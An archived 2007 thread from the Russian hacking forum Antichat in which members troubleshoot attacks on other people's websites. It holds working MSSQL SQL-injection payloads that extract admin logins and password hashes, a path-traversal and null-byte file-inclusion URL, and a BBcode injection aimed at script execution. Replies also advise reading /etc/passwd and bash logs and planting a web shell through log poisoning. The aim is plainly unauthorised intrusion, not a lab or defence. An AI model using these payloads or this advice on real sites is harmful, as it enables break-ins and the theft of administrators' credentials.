ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.08.2007, 10:12
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Ded MustD!e
Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос
1+or+1=(SELECT+TOP+1+Login+from+admin)--
он успешно выполняется, я вижу логин, затем пишу
1+or+1=(SELECT+TOP+1+PassHash+from+admin)--
и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся
Помогите, плиз!
для начала попробуй так:
Код:
1+or+1=(SELECT+TOP+1+PassHash+from+admin where Login='твой логин')--
но скорее всего так:
Код:
1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b'%20qwerty')+from+admin)--
в таком случае твой хеш это то что будет идти до qwerty
__________________
Карфаген должен быть разрушен...
|
|
|
25.08.2007, 10:39
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Ded MustD!e
1)у меня нет аккаунта на сайте
2)выдает ошибку: Syntax error converting the varchar value 'qwerty' to a column of data type int.
перед qwerty ничего...
1. да причем здесь твой аккаунт имелось ввиду логин который ты получил через скулю...
2. тогда так попробуй (и чтоб вопросов не возникло смотри п.1):
Код:
1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b'%20qw erty')+from+admin where Login='логин который ты получил')--
хотя точно тебе никто нескажет... остается угадывать, вот если б ты линк дал со скулей, тогда бы помогли скорее всего
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 25.08.2007 в 10:51..
|
|
|
|
25.08.2007, 10:54
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
значит первое значение passhash пустое... пробуй следующий логин...
ЗЫ кстати тут convert() наверное не нужен
ЗЗЫ Еслиб линк бы сразу дал, меньше бы флуда было
ЗЗЗЫ Или в асю мне стучи... посмотрим че там...
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 25.08.2007 в 11:02..
|
|
|
|
25.08.2007, 12:14
|
|
Познающий
Регистрация: 02.05.2007
Сообщений: 55
Провел на форуме:
1010156
Репутация:
107
|
|
Доброго дня)
Возникла проблема с заливкой шела в движке Insart.Content
Имеется полный доступ к админке, есть возможность загрузки любых файлов, в том числе и *.php. Но, система отказывается выполнять код, а просто выводит его на экран => не полчается запустить шелл.
Двиг на asp. Ссылку на загруженный шел формирует вида: getfile.asp?id={3AC9A519-4730-4C84-81AB-8A59A69A3F0C}
Какие могут быть пути решения данной проблемы?
|
|
|
|
25.08.2007, 13:15
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466
Репутация:
11
|
|
Сообщение от Ded MustD!e
1)у меня нет аккаунта на сайте
2)выдает ошибку: Syntax error converting the varchar value 'qwerty' to a column of data type int.
перед qwerty ничего...
1+or+1=(SELECT+TOP+1+PassHash+from+admin where Login='твой логин')--
Он имел виду логин который ты сам смог нарыть,администратора или ещё кого... 
|
|
|
|
25.08.2007, 14:02
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466
Репутация:
11
|
|
У меня вопрос таков...
На кое каком движке я обнаружел что ббтэг не соовсем написан правельно,и поэтому можно что то намутить.
Поскольку я не спец,то решил посоветоватся тут.
тэг [mp3]тут ссылка на файл[/mp3]
возможно ставить любую ссылку,тоесть без начало http:// и без конца .mp3 .
К примеру
Код:
[mp3]http://address.com/shell.php?hack=now[/mp3]
в результате в коде сайта это выглядит так
Код HTML:
<embed autostart="false" loop="false" controller="true" width="220" height="42" src=http://address.com/shell.php?hack=http://address.com/shell.php?hack=now></embed>
Ну а теперь вопрос,что можно с этим сделать ?
P.S: все различные ковычки ( ' " < >) он фильтрует. но можно обойти ещё и через flash файлы. работает а так же ббтэг [swf]ссылка[/swf] .
Где можно достать гид по созданию flash атаки,что бы работал с javascript .
Последний раз редактировалось Nazaret2005; 25.08.2007 в 14:21..
|
|
|
|
27.08.2007, 04:48
|
|
Познающий
Регистрация: 13.03.2007
Сообщений: 55
Провел на форуме:
297449
Репутация:
17
|
|
Query failed: Table 'mobolan.config' doesn't exist
оно само прописует mobolan, таблица конфиг точно есть!!!
|
|
|
|
27.08.2007, 06:24
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
на запрос логина админа сервер выдал мне:
Код:
4Ruket&ebUSPaPhAf#stUchUthE4EBU+AVEq_dravEbREk$Zud#trat$us?EcaqE
а на пароль:
Код:
az#NAf7A!uw9e&h#cHANej_pr*hupr-yaChe@$u!uthUthesabatRuQEq+4r&crU&
Первый раз с этим столкнулся, вопрос, что ЭТО? |
|
|
|
27.08.2007, 07:47
|
|
Познающий
Регистрация: 08.06.2007
Сообщений: 75
Провел на форуме:
517024
Репутация:
76
|
|
Есть вопрос по читалке файлов. Докопал я, значит, до http://site.com/index.php?ctr=../../index.php%00
Выводится пустая страница только когда я пробую открыть сам индекс через него же.
Показывает другие файлы из рут директории, но пхп файлы обрабатываются интерпретатором PHP. Вопросы -
1 Возможно ли потянуть исходники пхп файлов?
2 Как можно и возможно ли просмотреть содержимое директорий через этот dir trav?
3 Чего стоящего стоит еще почитать на сервере кроме etc/passwd и логов баша?
4 Есть ли альтернативный метод инклуда пхп файла, кроме как с нулевым байтом на конце, путем без расширения, с ? на конце и просто адресом к исходнику?
5 Есть у кого набор самых часто используемых путей до /htdocs в юниксе?
Буду оч признателен за подсказку.
|
|
|
|
27.08.2007, 09:18
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от mindw0rk
Есть вопрос по читалке файлов. Докопал я, значит, до http://site.com/index.php?ctr=../../index.php%00
Выводится пустая страница только когда я пробую открыть сам индекс через него же.
Показывает другие файлы из рут директории, но пхп файлы обрабатываются интерпретатором PHP. Вопросы -
1 Возможно ли потянуть исходники пхп файлов?
2 Как можно и возможно ли просмотреть содержимое директорий через этот dir trav?
3 Чего стоящего стоит еще почитать на сервере кроме etc/passwd и логов баша?
4 Есть ли альтернативный метод инклуда пхп файла, кроме как с нулевым байтом на конце, путем без расширения, с ? на конце и просто адресом к исходнику?
5 Есть у кого набор самых часто используемых путей до /htdocs в юниксе?
Буду оч признателен за подсказку.
Ничего странного, если, предположим, в index.php код <?php include $ctr; ?> , то результат вполне ожидаем.
1. нет, если они с расширением php, с другими расширениями должно заинклудиться.
2. как правило, нет. можно конечно написать эксплоит для этого инклуда, который будет брутить имена файлов, но это глупо.
3. зависит от сервера. я бы порекомендовал залить шелл, почитав error.log (о том, как это сделать, читай на форуме). ну и конфиг апача (httpd.conf)
4. ...
5. смотри статью Единички "У природы нет плохой погоды", а также ищи на форуме.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
